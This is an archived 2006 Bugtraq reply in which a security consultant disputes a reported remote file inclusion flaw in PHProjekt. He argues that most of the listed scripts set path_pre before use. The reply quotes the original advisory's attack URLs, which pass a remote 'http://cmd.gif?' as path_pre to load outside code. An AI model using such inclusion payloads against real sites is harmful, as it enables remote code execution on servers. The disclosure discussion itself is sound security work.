| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 24 Aug 2006 00:51:34 +0200 From: "Carsten Eilers" <ceilers-lists@....de> To: <D3nGeR@...il.CoM>, <bugtraq@...urityfocus.com> Subject: Re: PHProjekt v0.6.1 Remote File Inclusion Vulnerability (2) Hi, D3nGeR@...il.CoM schrieb am Mon, 21 Aug 2006 19:26:55 +0000: ># http://[Target]/[Path]/cm_lib.inc.php?path_pre=http://cmd.gif? This script uses path_pre only as a part of for example $cm_cfgpath. It may be possible to use it, but it may be a little bit complicate. ># http://[Target]/[Path]/doc/br.edithelp.php?path_pre=http://cmd.gif? > ># http://[Target]/[Path]/doc/de.edithelp.php?path_pre=http://cmd.gif? > ># http://[Target]/[Path]/doc/ct.edithelp.php?path_pre=http://cmd.gif? > ># http://[Target]/[Path]/userrating.php?path_pre=http://cmd.gif? > ># http://[Target]/[Path]/listing.php?path_pre=http://cmd.gif? All of this script intialize $path_pre and I see no way to manipulate them between initialization and usage. Regards Carsten -- Dipl.-Inform. Carsten Eilers IT-Sicherheit und Datenschutz <http://www.ceilers-it.de>
Powered by blists - more mailing lists